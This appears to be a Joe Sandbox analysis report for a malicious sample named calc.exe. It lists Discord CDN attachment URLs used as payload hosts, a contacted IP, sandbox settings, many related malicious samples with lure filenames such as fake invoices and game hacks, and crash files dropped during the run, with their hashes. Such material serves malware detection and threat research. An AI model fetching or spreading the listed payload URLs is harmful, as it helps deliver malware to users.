                                                                                                                            https://cdn.discordapp.com/attachments/89722370764951560calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ART.calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ART.txcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphoneWerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://cdn.discordapp.com/attachments/89722calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephoneWerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://upx.sf.netAmcache.hve.5.drfalse
                                                                                                                                          high
                                                                                                                                          https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_Acalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://cdn.discordapp.comcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://cdn.discordapp.com/attachmencalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://cdn.discordapp.com/acalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://cdn.discordapp.com/attachments/897223707649515602/897228calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://cdn.discordapp.com/attachments/897223707649515602/89calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://cdn.discordapp.com/attachments/897223707649515602/897228595318124554/ascii_ART.tcalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://cdn.discordapp.com/attachments/897223707649515602/897calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://cdn.discordapp.com/attachments/897223707649515602/8972285953181calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 00000005.00000003.265173725.00000000059A0000.00000004.00000001.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://cdn.discordapp.com/attachments/8972237076495calc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://cdn.discordapp.com/attachmecalc.exe, 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high

                                                                                                                                                                        Contacted IPs

                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                        Public

                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                        162.159.135.233
                                                                                                                                                                        cdn.discordapp.comUnited States
                                                                                                                                                                        13335CLOUDFLARENETUSfalse

                                                                                                                                                                        Private

                                                                                                                                                                        IP
                                                                                                                                                                        192.168.2.1

                                                                                                                                                                        General Information

                                                                                                                                                                        Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                                        Analysis ID:510683
                                                                                                                                                                        Start date:28.10.2021
                                                                                                                                                                        Start time:04:55:03
                                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                                        Overall analysis duration:0h 5m 51s
                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                        Report type:light
                                                                                                                                                                        Sample file name:calc.exe
                                                                                                                                                                        Cookbook file name:defaultwindowsfilecookbook.jbs
                                                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                        Run name:Without Tracing
                                                                                                                                                                        Number of analysed new started processes analysed:26
                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                        Technologies:
                                                                                                                                                                        • HCA enabled
                                                                                                                                                                        • EGA enabled
                                                                                                                                                                        • HDC enabled
                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                        Detection:MAL
                                                                                                                                                                        Classification:mal80.evad.winEXE@3/7@1/2
                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                        HDC Information:
                                                                                                                                                                        • Successful, ratio: 2.1% (good quality ratio 2.1%)
                                                                                                                                                                        • Quality average: 75.7%
                                                                                                                                                                        • Quality standard deviation: 27.6%
                                                                                                                                                                        HCA Information:
                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                        • Adjust boot time
                                                                                                                                                                        • Enable AMSI
                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                        Warnings:
                                                                                                                                                                        Show All
                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                        • TCP Packets have been reduced to 100
                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 20.82.210.154, 204.79.197.200, 13.107.21.200, 23.211.6.115, 23.211.4.86, 20.42.65.92, 20.50.102.62, 80.67.82.235, 80.67.82.211, 40.112.88.60
                                                                                                                                                                        • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                                                                                                                                        • Execution Graph export aborted for target calc.exe, PID 2952 because it is empty
                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                                        Simulations

                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                        04:56:24API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                        IPs

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        162.159.135.233mosoxxxHack.exeGet hashmaliciousBrowse
                                                                                                                                                                        • cdn.discordapp.com/attachments/710557342755848243/876828681815871488/clp.exe
                                                                                                                                                                        Sales-contract-deaho-180521-poweruae.docGet hashmaliciousBrowse
                                                                                                                                                                        • cdn.discordapp.com/attachments/843685789120331799/844316591284944986/poiu.exe
                                                                                                                                                                        PURCHASE ORDER E3007921.EXEGet hashmaliciousBrowse
                                                                                                                                                                        • cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe
                                                                                                                                                                        Waybill Document 22700456.exeGet hashmaliciousBrowse
                                                                                                                                                                        • cdn.discordapp.com/attachments/809311531652087809/839856358152208434/May_Blessing.exe
                                                                                                                                                                        COMPANY REQUIREMENT.docGet hashmaliciousBrowse
                                                                                                                                                                        • cdn.discordapp.com/attachments/819674896988242004/819677189900861500/harcout.exe
                                                                                                                                                                        Email data form.docGet hashmaliciousBrowse
                                                                                                                                                                        • cdn.discordapp.com/attachments/789279517516365865/789279697203757066/angelx.scr
                                                                                                                                                                        Down Payment.docGet hashmaliciousBrowse
                                                                                                                                                                        • cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
                                                                                                                                                                        Vessel details.docGet hashmaliciousBrowse
                                                                                                                                                                        • cdn.discordapp.com/attachments/780175015496777751/781048233136226304/mocux.exe
                                                                                                                                                                        Teklif Rusya 24 09 2020.docGet hashmaliciousBrowse
                                                                                                                                                                        • cdn.discordapp.com/attachments/733818080668680222/758418625429372978/p2.jpg

                                                                                                                                                                        Domains

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        cdn.discordapp.comj1XcBWNHwh.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.134.233
                                                                                                                                                                        xiLz7khg4J.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.129.233
                                                                                                                                                                        e6AynLSw3y.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.134.233
                                                                                                                                                                        sboPQqfpHN.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        oytu1F59dV.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.130.233
                                                                                                                                                                        Early_Access.-3878_20211027.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.134.233
                                                                                                                                                                        Casting Invite.-859403670_20211027.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.130.233
                                                                                                                                                                        Nwszeclpfkywlsrvlpglyrnsilmxebigcs.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.133.233
                                                                                                                                                                        Hl9GJ6GvUS.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.134.233
                                                                                                                                                                        TEaKKn2Dkf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        Km5KAxQLLV.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.134.233
                                                                                                                                                                        mJ1frOovsp.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.134.233
                                                                                                                                                                        IB5eMmKwbD.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.129.233
                                                                                                                                                                        IDSTATEMENTS.vbsGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.130.233
                                                                                                                                                                        payment.xlsGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.133.233
                                                                                                                                                                        r18qGHf6vL.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.134.233
                                                                                                                                                                        36#U0443.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.129.233
                                                                                                                                                                        f25d7dae55dc8c848e9fed3f218f886f4ca4412e5b94a.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.134.233
                                                                                                                                                                        8cc8f28391efb0099a231da1df27d6acc2a9dbfdc11d5.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.130.233

                                                                                                                                                                        ASN

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        CLOUDFLARENETUScalc.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.129.233
                                                                                                                                                                        S54vrlOu0b.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.68.139
                                                                                                                                                                        SOA.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 172.67.188.154
                                                                                                                                                                        MSG67228.htmlGet hashmaliciousBrowse
                                                                                                                                                                        • 104.16.18.94
                                                                                                                                                                        j1XcBWNHwh.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.134.233
                                                                                                                                                                        Invoice - INV-112289154.htmlGet hashmaliciousBrowse
                                                                                                                                                                        • 104.16.18.94
                                                                                                                                                                        0001.dllGet hashmaliciousBrowse
                                                                                                                                                                        • 172.67.70.134
                                                                                                                                                                        xiLz7khg4J.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.129.233
                                                                                                                                                                        0001.dllGet hashmaliciousBrowse
                                                                                                                                                                        • 104.26.6.139
                                                                                                                                                                        e6AynLSw3y.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.134.233
                                                                                                                                                                        invoice_32.dllGet hashmaliciousBrowse
                                                                                                                                                                        • 172.67.69.19
                                                                                                                                                                        Project update-xl32.dllGet hashmaliciousBrowse
                                                                                                                                                                        • 104.26.6.139
                                                                                                                                                                        digital.alarmclock.alarmy.apkGet hashmaliciousBrowse
                                                                                                                                                                        • 104.26.1.100
                                                                                                                                                                        digital.alarmclock.alarmy.apkGet hashmaliciousBrowse
                                                                                                                                                                        • 104.26.1.100
                                                                                                                                                                        0001.dllGet hashmaliciousBrowse
                                                                                                                                                                        • 172.67.69.19
                                                                                                                                                                        e6dff8475541ebddc1f0db47a311eb2c25581b7d5e62a.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.26.8.187
                                                                                                                                                                        RYATPPETU.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 172.67.161.80
                                                                                                                                                                        bdumk5V3ry.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 172.67.188.154
                                                                                                                                                                        BBVA-Confirming Facturas Pagadas al Vencimiento.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 104.21.19.200
                                                                                                                                                                        sboPQqfpHN.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.134.233

                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0ecalc.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        j1XcBWNHwh.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        DHL_Shipment_Notification.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        mxZECDzIFz.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        RFQ TESDA PROJECT.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        IB5eMmKwbD.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        DHL_waybill20212810.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        r18qGHf6vL.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        PR-007493 PR-007495.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        Software updated by Dylox.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        open this if the doesn't work.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        hSNPFOpBGX.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        XoPspkwdql.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        jamDpbFXfr.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        SOkQ2u6sxV.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        PR-007493 PR-007495.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        INVOICE 003.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        Genshin Hack v2.0.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        Fortnite Hack Mod v1.4.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233
                                                                                                                                                                        Ghost_hack_v4.6.8_winx64.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.159.135.233

                                                                                                                                                                        Dropped Files

                                                                                                                                                                        No context

                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_calc.exe_8ef77563ee27693eb8c931177e339197ffc03d22_5b8918c7_17d5608e\Report.wer
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                        Entropy (8bit):1.1474137951894232
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:xjFcoHBUZMXyaKsUAeZg/u7szS274ItOh:FFbBUZMXyalmg/u7szX4ItOh
                                                                                                                                                                        MD5:E3079ED555F8784B1284D8F81FEC9B71
                                                                                                                                                                        SHA1:FC6ACCFA617583415F5958049D09441AA7452585
                                                                                                                                                                        SHA-256:941B2A5E239EB42808412C345DB264A65B29CF52FAF0DBD072306A69D8028FA3
                                                                                                                                                                        SHA-512:EA3A830960A6ADB86A1CAFCDF9D2F57E984FC9EB9C5B53526450477AE48F11BA04E1C2F6228B69121ABC4AE7824B89361AC0B82ABD0BA722CDE82296E9E3949C
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.9.8.9.5.7.7.1.0.8.5.9.8.4.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.9.8.9.5.7.8.2.2.8.9.0.7.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.b.c.2.a.7.c.0.-.0.0.6.2.-.4.3.1.0.-.8.6.c.8.-.4.9.0.e.8.0.6.e.c.4.3.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.0.3.f.9.f.2.2.-.7.1.9.b.-.4.5.9.7.-.a.4.5.f.-.1.8.6.3.3.b.3.5.3.7.4.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.a.l.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.c.a.l.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.8.8.-.0.0.0.1.-.0.0.1.6.-.9.d.d.8.-.0.c.c.8.f.2.c.b.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.8.1.1.0.b.5.1.3.2.f.6.9.6.4.4.a.c.7.a.f.3.5.2.4.8.8.e.1.0.f.f.0.0.0.0.0.0.0.0.!.0.0.0.0.f.5.7.4.a.a.3.b.b.e.5.5.4.3.6.3.a.6.f.6.d.1.d.6.4.8.c.3.1.5.0.5.b.f.9.2.b.f.e.5.!.c.a.l.c...
                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DC6.tmp.dmp
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Oct 28 11:56:13 2021, 0x1205a4 type
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):254011
                                                                                                                                                                        Entropy (8bit):3.814697195905774
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:paoIpOFK0J9gIOgF5ckU0bUCgUplxWnhN51sfjd+pdjgbJLO:pa70J9RpDckU0TjEhp61
                                                                                                                                                                        MD5:B93804DE4258B1105B8090352B846E2E
                                                                                                                                                                        SHA1:BEEA675AD292DFEB8A6FB47DE64222EF9607DFE7
                                                                                                                                                                        SHA-256:3F6B581CB6C062B6EC657CB971B63B5AF381035AF3B60F231F17579B76A06B01
                                                                                                                                                                        SHA-512:054991F34A5C3DAB1A352515384DCC3E738F3BF6875BC592389CC4FF04AD2235A391250F13658401BF79BA6F5E8858570A5BD32CD65555CDFA684A5331CE6820
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview: MDMP....... ........za............D...............X.......<....&......4"...V..........`.......8...........T...........@R.............. '...........)...................................................................U...........B.......)......GenuineIntelW...........T............za.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER39DC.tmp.WERInternalMetadata.xml
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):8364
                                                                                                                                                                        Entropy (8bit):3.691637181662257
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:Rrl7r3GLNi4a6lObZ6YIxSUy4WgmfZlSwCprT89b+sysf1Km:RrlsNit6I6YeSUyxgmfbSM+6fJ
                                                                                                                                                                        MD5:8EF2457FBD84949C70B2EEC51F59391B
                                                                                                                                                                        SHA1:466DE618B6FBEB213AE7D7186DC3C2E63D861258
                                                                                                                                                                        SHA-256:2534645C37D6CDF3E238408F48833C98E5CB63532062E4D7EEB9A4D992A6A586
                                                                                                                                                                        SHA-512:4C98168125A5B504E50399E423FCEDD9CAAEC093AE4CEC1597BD3835BC0185C37C24BD10502BB2825B5DE9D8AD8C819303825DFB615D27F9092C709E31041516
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.9.5.2.<./.P.i.d.>.......
                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER3D29.tmp.xml
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):4701
                                                                                                                                                                        Entropy (8bit):4.435584303749706
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:cvIwSD8zslJgtWI9/3WSC8BD8fm8M4JPNJFvb+q8vONdz59hIrd:uITf/YGSNiJPRbKOfz59hIrd
                                                                                                                                                                        MD5:E10D27EAC2005BF7AFF83798F490811E
                                                                                                                                                                        SHA1:2CA257C71C3C9507271B478F68A6DEAC0FDB5E8D
                                                                                                                                                                        SHA-256:0A7A306E54A36B75D0A35D4F6DB91DB80B8EE7FCDDCB83623741913BE16D8E0A
                                                                                                                                                                        SHA-512:6DB022BF74F9F19E8C6AF18CFB90923055298EF4DFA671D9F3E3C6935E8B3272F3F4BF6D08D036DDB02199FB5FDBE59694FF40194FF28004C19A0768296F5AC4
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1229586" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1572864
                                                                                                                                                                        Entropy (8bit):4.268369717589601
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12288:YHlkj4KQWMEtWUipWroyKRPRAOfC/dSwwO/xjOloiZPNsI9Ev0DNiDpl8:4lkj4KQWMEtWUipQ4fOl
                                                                                                                                                                        MD5:56751A5793A0EDDD76004DD711F78521
                                                                                                                                                                        SHA1:5B5C5E235E5602FCEFDCB5954B76B16268E60EF6
                                                                                                                                                                        SHA-256:5BC3D1CA8FBB47D2D91584E9E88895CF3DDEDA00BE0C68A809144B4470D61FE5
                                                                                                                                                                        SHA-512:199734E6DA386B518ABFC091DB082E00D3FD636FB166537BFDDDA0757387E18B35D5D217B2CC57D3B3514933FC67517993404228794A73169F794F163CAB8DF1
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview: regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.-".................................................................................................................................................................................................................................................................................................................................................TU&.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                        Entropy (8bit):3.8933024346229366
                                                                                                                                                                        Encrypted:false
